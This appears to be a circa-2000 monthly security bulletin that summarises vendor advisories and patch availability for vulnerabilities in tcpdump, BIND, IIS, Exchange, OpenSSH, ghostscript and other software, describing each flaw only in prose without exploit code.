Tcpdump is a free sniffer program. It is most commonly used to capture ethernet packets in a common format that many analysis tools can  read. It is the basis for many Intrusion Detection Software applications. Several overflowable buffers were discovered in the version of tcpdump included in many OS'. Some simply allow the remote attacker to crash the local tcpdump process. This is a problem for systems using tcpdump as a form of intrusion detection. A more serious vulnerability in the decoding of AFS ACL packets in the more recent version of tcpdump (tcpdump 3.5) which may allow a remote attacker to execute arbitrary code on the local system (usually at root privilege). For FreeBSD patches are available now.

Under certain circumstances, the included JRun 3.0 http servlet server may improperly utilize server resources with deliberately malformed URIs. This behavior may lead to a Denial-of-Service condition if the server is flooded with these kinds of requests. A patch is available for systems under Windows and Unix.

As part of its normal processing of incoming mails, Exchange server checks for invalid values in the MIME header fields. If a particular type of invalid value is present in certain fields, the Exchange service will fail - Denial-of-Service. This issue will be fixed in SP4 for Exchange, a patch is available also.

As we reported before, a vulnerability caused by a remotely exploitable buffer overflow condition in one of Network Monitor's protocol parsers has been found. This may allow a remote attacker to gain privileged access and execute arbitrary code on any machine running Network Monitor that displays  captured data. Now Microsoft has published patches for Microsoft Windows NT 4.0 Server and Windows NT 4.0 Server, Enterprise Edition, Microsoft Windows 2000 Server, Advanced Server and Datacenter Server, Microsoft Systems Management Server 1.2, and Microsoft Systems Management Server 2.0. The patch for Microsoft Windows NT 4.0 Server, Terminal Server Edition will be released shortly.

A vulnerability could allow a malicious web site operator to misuse another web site as a means of attacking user - so called Cross-Site Scripting. It results when web applications don't properly validate inputs before using them in dynamic web pages. If the user loads pages from a malicious site, the operator of this site would be able to "inject" script into a Web page from another Web server, which would then be delivered to the user. The net effect would be to cause the malicious user's script to run on the user's machine using the trust afforded the other site. It's recommended to install a patch for Indexing Services under Windows 2000.

This is a Re-Release of an earlier advisory regarding the Internet Information server. A vulnerability could allow a malicious web site operator to misuse another web site as a means of attacking user - so called Cross-Site Scripting. It results when web applications don't properly validate inputs before using them in dynamic web pages. If the user loads pages from a malicious site, the operator of this site would be able to "inject" script into a Web page from another Web server, which would then be delivered to the user. The net effect would be to cause the malicious user's script to run on the user's machine using the trust afforded the other site. Microsoft recommends to install patches for Internet Information Server 4.x  and 5.x.

An ActiveX control that ships as part of Windows 2000 contains an unchecked buffer. If the control was called from a web page or HTML mail using a specially-malformed parameter, it would be possible to cause code to execute on the machine via a buffer overrun. This could potentially enable a malicious user to take any desire action on the user's machine, limited only by the permissions of the user. Affected are Windows 2000 Server, Professional, Advanced Server, and Datacenter Server.  It's recommended to install a patch. 

A "format string vulnerability" was discovered in code used by the vipw utility. The vipw utility does not run with increased privileges but this code is also shared with other utilities - namely chfn, chpass, chsh, ypchfn, ypchpass, ypchsh and passwd -- which do in fact run setuid root, a root-exploit included. The pine4 port, versions 4.21 and before, contains a buffer overflow vulnerability which allows a remote user to execute arbitrary code on the local client by the sending of a special-crafted email message.The boa port, versions after 0.92 but prior to 0.94.8.3, contains a vulnerability which allows remote users to view arbitrary files outside the document root. The vulnerability is that boa does not correctly restrict URL-encoded requests containing ".." in the path. Several overflowable buffers were discovered in the version of tcpdump included in FreeBSD. A "format string vulnerability" was discovered in the top(1) utility which allows unprivileged local users to cause the top process to execute arbitrary code. An off-by-one error exists in the processing of DNS hostnames which allows a long DNS hostname to crash the getnameinfo() function when an address resolution of the hostname is performed. Patches are available now.

A race condition has been found in the nss_ldap package. On a system running nscd, an attacker can cause the system to hang. A locally-exploitable security hole was found where a normal user could trick root running GnoRPM into writing to arbitrary files due to a bug in the gnorpm tmp file handling. The Red Hat 7.0 dump is being released for Red Hat 6.x and Red Hat 5.x in order to remove root setuid bits to prevent a known dump exploit. By adding specific headers to messages, the pine mail reader and the imap server could be made to exit with an error message when users attempted to manipulate mail folders containing those messages.

Due to a security hole in dtterm users may gain unauthorized privileges on HP9000 systems running HP-UX releases 11.00, 11.04, 10.20, 10.24, and 10.10. Hewlett Packard has published patches:

A race condition exists in versions of nss_ldap prior to version 121. On a system running nscd, a malicious user can cause the system to hang. A patch is available now.

When the Internet Information Server receives a valid request for an executable file, it passes the name of the requested file to the underlying operating system for processing. Due to an implementation flaw in IIS 5.0 and 4.0, it's possible to create a specially-malformed file request that contains both a file name and one or more operating system commands. The IIS would pass the entire string to the operating system, which would first process the file and then execute the commands. So it's possible to execute arbitrary commands on the system the IIS is running on. A patch for the IIS 5.0 is available in English, German, Japanese, Simplified Chinese, Traditional Chinese. Microsoft has updated the advisory and points out the latest patch for IIS 4.0 and IIS 5.0.

An unchecked buffer in the Terminal Server login prompt could allow an attacker to cause the Terminal Server to execute arbitrary code, including adding, changing, or deleting data, runing code already on the server, or uploading new code to the server. The attacker would not need to successfully login to the Terminal Server remotely or direct. This vulnerability can only be exploited remotely if connection requests are not filtered. By default, Terminal Server listens on tcp port 3389. It's recommended to block this port to the Internet and to install the patch published by Microsoft.

Within the last month, 103 (!) new vulnerabilities were found:

As reported before, a procedure to use /opt/audio/bin/Aserver to gain root access has been made public. The MC/ServiceGuard file and directory permissions are incorrect which may lead to a Denial-of-Service. Affected are HP-9000 machines. It's recommended to install the concerning patches:

A vulnerability exists with the bind nameserver dealing with compressed zone transfers. This vulnerability can be exploited by authorized zone transfers and used in a DoS attack. The named daemon will crash if it receives this type of zone transfer from an authorized source address. The crash is not necessarily immediate, but can range from a few seconds to a few minutes from the time of the attack. This new version of bind also fixes a bug in the handling of the compression pointer tables which can result in the nameserver entering an infinite loop. This bug has been known to occur in the standard processing of SRV records used with Windows 2000 Active Directory. Updates are available now.

As Georgi Guninski reports, using the "ixsso.query" ActiveX object the mentioned products gives an attacker the possibility of unauthorized file searching. A demonstration is available - but no patch yet.

In BIND, the most used named, several possibilities for a Denial-of-Service were found.

In BIND several possibilities for a DoS were found. A vulnerability exists with all versions of OpenSSH prior to 2.3.0 with regards to the X11 forwarding and ssh-agent. If agent or X11 forwarding is disabled in the ssh client configuration, the client does not request these features during session setup. Another vulnerability exists with tcsh when using the in-here documents with the << syntax. When doing this, tcsh uses a temporary file to store the data. The temporary file is not created securely and standard symlink attacks can be used to make tcsh overwrite arbitrary files. Patches are available now.

In BIND several possibilities for a DoS were found. Caldera has published the concerning patches.

The version of gnupg that is distributed in Debian GNU/Linux 2.2 has a logic error in the code that checks for valid signatures which could cause false positive results. Tcsh doesn't handle in-here documents correctly, so it's possible to overwrite arbitrary files on the system. In BIND several possibilities for a successful Denial-of-Service was found. Patches are available now.

Systems running Internet Software Consortium (ISC) BIND version 8.2 through 8.2.2-P6 and Systems running name servers derived from BIND version 8.2 through 8.2.2-P6 show several holes which can be exploited for a DoS. It's strongly recommended to update the systems to BIND 8.2.2-P7 or BIND 9.0.1. Further information about the security holes can be found here.

Rideway PN V6.22 is a proxy application for Windows. As Strumpf Noir Society reports, it's vulnerable to a DoS-attack. If the Telnet Proxy is enabled and listening on port 23 (default Telnet port) an attacker could cause all proxy services to become unavailable.A patch is not available yet, but a demonstration is shown in the advisory.

In Linux Mandrake 7.2 two problems in CUPS were found. CUPS printers are accessible from anywhere on the internet. A bug also exists where CUPS would broadcast to everywhere and thus keep open dial-on- demand lines. All 2.3.x versions of modutils (since March 12 1999) contain a vulnerability that can lead to a local root compromise. Patches are available now.

A vulnerability was found in ncurses: An overflowable buffer in the libncurses library in the processing of cursor movement may cause an attacker to execute arbitrary code on the local system with the privileges of the exploited binary. The telnet protocol allows for UNIX environment variables to be passed from the client to the user login session on the server. However, some of these environment variables have special meaning to the telnetd child process itself and may be used to affect its operation. It's possible, that an attacker may consume resources on the target system. 
The ppp(8) utility includes network address translation functionality for translating between public and private IP address ranges. It uses the libalias library to perform translation services. Users who are using the deny_incoming functionality in the expectation that it provides a "deny by default" firewall which only allows through packets known to be part of an existing NAT session, are in fact allowing other types of unsolicited IP traffic into their internal network. Patches are available now.

In early shipments of Exchange 2000, setup creates an account with a known username and password. Under normal circumstances, this username and password can be only used to gain local user level access but on installations where Exchange is installed on a Domain Controller, Domain wide access could be obtained if one was to discover this username and password. Microsoft has provided a patch to fix this problem. RS-2000.291, WinITSec

Modutils, a package that helps the kernel automatically load kernel modules (device drivers etc.) when they're needed, could be abused to execute code as root. A HTML Buffer Overflow in Netscape Communicator has been found and fixed. When exiting joe in a nonstandard way (such as a system crash, closing an xterm, or a network connection going down), joe will unconditionally append its open buffers to the file "DEADJOE". This could be exploited by the creation of DEADJOE symlinks in directories where root would normally use joe. In this way, joe could be used to append garbage to potentially sensitive files, resulting in a denial of service.

It's possible to cause the AntiVirus Agent to fail when two separate Microsoft Exchange servers, both running Computer Associates Inoculate for Exchange communicate via the Microsoft Internet Mail Connector (IMC). There are multiple ways to accomplish this. Further information can be found in the advisory, a patch hasn't been released yet.

In Secure Shell, ssh, when the connection is established the remote ssh server can force the ssh client to enable agent and X11 forwarding. Several problems in Vixie Cron, including insecure permissions on temporary files and race conditions in their deletion, allow attacks from a Denial-of-Service to an escalation of priviledge. CUPS has a rather vague problem to the effect of "everyone on the Internet can get to your printers". Debian has published fixes that should be installed soon.

As reported before, there is a vulnerability in using Session ID Cookies (encrypted and plaintext) with ASP's. Now Microsoft has published a new patch for IIS 4.0 on x86 platforms (Alpha on request by Microsoft) and IIS 5.0.

A security vulnerability was found in auto_parms and set_parms on HP9000 Series 700/800 running HP-UX releases 10.xx and 11.xx. It may allow remote users to gain root access or to disrupt normal operations. It's recommended to install the following patches:

CERT has published a summary, pointing out the recent trends in security issues. The following were the most used exploits:
- Compromises Via an Input Validation Vulnerability in rpc.statd
- Compromises Via the 'SITE EXEC' Vulnerability in FTPd
- Compromises Via a Vulnerability in the IRIX Telnet Daemon
- VBS/Loveletter.AS Worm
- QAZ Worm
- Multiple Denial of Service Problems in ISC BIND

Exploiting a hole in mgetty local users may create or overwrite any file on the system. The curl port allows a client-side exploit through a buffer overflow in the error handling code. The thttpd port allows remote viewing of arbitrary files on the local server. The 'ssi' cgi script does not correctly restrict URL-encoded requests containing ".." in the path. The mod_php ports contain a potential vulnerablilty that may allow a remote attacker to execute arbitrary code as the user running the web server. The csh and tcsh code creates temporary files when the '<<' operator is used, however these are created insecurely and use a predictable filename based on the process ID of the shell. An attacker can exploit this vulnerability to overwrite an arbitrary file writable by the user running the shell. There exists an overflowable buffer in the libncurses library in the processing of cursor movement capabilities. Patches are available now.

A flaw in the way that NTLM authentication operates in Windows 2000 could allow a domain account lockout policy to be bypassed on a local Windows 2000 machine, even if the domain administrator had set such a policy. The ability of a malicious user to avoid the domain account lockout policy could increase the threat from a brute force password-guessing attack. This vulnerability only affects Windows 2000 machines that are members of non-Windows 2000 domains. In addition, the vulnerability only affects domain user accounts that have previously logged into the target machine and already have cached credentials established on that machine. Microsoft has published a patch. 

Caldera reports about two new problems in ghostscript: temporary files are created insecurely and the program is linked in a way that makes it pick up shared libraries from the current directory it is in. Both problems can give increased privilege on the system, Patches are available.

Local users to run arbitrary commands as root if the machine is running a kernel with kmod enabled. Another problem was found with giving parameters to modprobe. Tcpdump may crash by sending carefully crafted packets to a network that is being monitored with tcpdump. The version of the ncurses display library shipped with Debian GNU/Linux 2.2 is vulnerable to several buffer overflows. A buffer overflow in ncurses, linked to the "cda" binary, allows a root exploit. Two setuid helpers for accessing cddb databases and SCSI cdrom drives are vulnerable. These are xmcd and cddb. The porblem in joe concerning DEADJOE is also present in Open Linux. An attacker can exploit some overflows by sending carefully crafted packets to a network that is being monitored by ethereal. Patches are available now.

A defect in the Event Monitoring System (EMS) version A.03.00 allows users to change file permissions on any file in the root partition. This affects ServiceGuard OPS edition as well as MC/ServiceGuard. It's recommended to migrate to EMS A.03.20.

A problem exists with the gmix program in the gnome-media package. When exiting joe in a non-standard way (such as a system crash, closing an xterm, or a network connection going down), joe will unconditionally append its open buffers to the file DEADJOE. This may corrupt files knowingly or unknowingly. By adding specific headers to messages, the pine mail reader could be made to exit with an error message when users attempted to manipulate mail folders containing those messages. The ghostscript package uses mktemp instead of mkstemp to create temporary files. It also uses improper LD_RUN_PATH values, which causes it to search for libraries in the current directory. Patches are available now.

Two independent vulnerabilities have been found in the Windows Media Player:
1) Windows Media Player supports the use of Active Stream Redirector (.ASX) files to enable users to play streaming media that resides on intranet or Internet sites. The code that parses .ASX files has an unchecked buffer, and this could potentially enable an attacker to run code of his choice on the machine of another user. 
2) Windows Media Player 7 introduced a feature called "skins", that allows customization of the look and feel of Windows Media Player. A custom skin (.WMS) file could potentially include script, which would execute if Windows Media Player was run and that skin was selected. An attacker could either send a customized skin containing script to another user and try to entice her into using it, or he could host such a file on a web site and cause it to launch automatically whenever a user visited the site. Because the code would reside on the user's local machine, it would be able to execute ActiveX controls, including ones not marked "safe for scripting". This would enable the code to take any action that can be accomplished via an ActiveX control.
It's strongly recommended to install the patches for Windows Media Player 6.4 and Windows Media Player 7, respectively.

The way ghostscript uses temporary files is insecure: mktemp is used to create a name for a temporary file, but the file isn't opened safely. Another problem is that during build, the LD_RUN_PATH environment variable was set to the empty string, which causes the dynamic linker to look in the current directory for shared libraries. A patch is available now.

An OpenSSH client will do agent or X11 forwarding at the request of a server, even if the user has not requested that it be done. A malicious server can exploit this vulnerability to gain access to the user's display. ghostscript makes use of mktemp to create temp files, which is an insecure and predictable apporoach, it is now patched to use mkstemp, which avoid the race condition on the name.

All 2.3.x versions of modutils (since March 12 1999) contain a vulnerability that can lead to a local root compromise. The version of userdrake has a serious problem on systems where shadow passwords are not used. By adding specific headers to messages, the pine mail reader could be made to exit with an error message when users attempted to manipulate mail folders containing those messages. Patches are available now.

As Caldera reports, bash creates temp files for here scripts insecurely. This can be exploited via a symlink attack to create or write over arbitrary files on the system if the shell is run by root. A patch is available now.

There used to be an overflowable buffer in the part of the ncurses library handling cursor movement. The"<<" operator in bash 1.x used predictable filenames, leading to a potential denial of service attack.

Under certain circumstances, the Java Runtime Environment may allow an untrusted Java class to call into a disallowed class - this is a  potential security issue. Patches are available now.

There is a denial of service vulnerability that affects Windows NT 4.0 Windows 95, 98, 98 Second Edition and Windows Me. By sending a flood of specially formed TCP/IP packets to a machine an attacker could cause either of two effects. In the most likely case, the flood would temporarily prevent any networking resources on an affected computer from responding to client requests; as soon as the packets stopped arriving, the machine would resume normal operation. In a less likely case, the system could hang, and remain unresponsive until it was rebooted. This vulnerability could only be exploited if TCP port 139 is open on the target machine. It's recommended to install a patch for Microsoft Windows NT, for the other systems a workaround has been published.

The two vulnerabilities in BIND, published by ISC, affect the AIX Nameserver also. IBM has published fixes now.

Gnorpm is a graphical user interface to the rpm subsystem for the gnome desktop. The handling of temporary files is insecure, so the gnorpm package may overwrite arbitrary files on the system. A workaround and Patches are available now. 

The bash1 shell program has the same "<<" vulnerability that tcsh has and incorrectly creates temporary files. A problem exists with previous versions of CUPS that made CUPS printers accessible from anywhere on the internet. A bug also existed where CUPS would broadcast to everywhere and thus keep open dial-on-demand lines. Mandrake has published fixes now.

A variety of denial-of-service vulnerabilities has been explored and documented by BindView's RAZOR Security Team. These vulnerabilities allow attackers to consume limited resources on victim machines. BindView's RAZOR Security Team has referred to these vulnerabilities as Naptha vulnerabilities. Many systems are affected by these vulnerabilities - further information is pointed out in the advisory.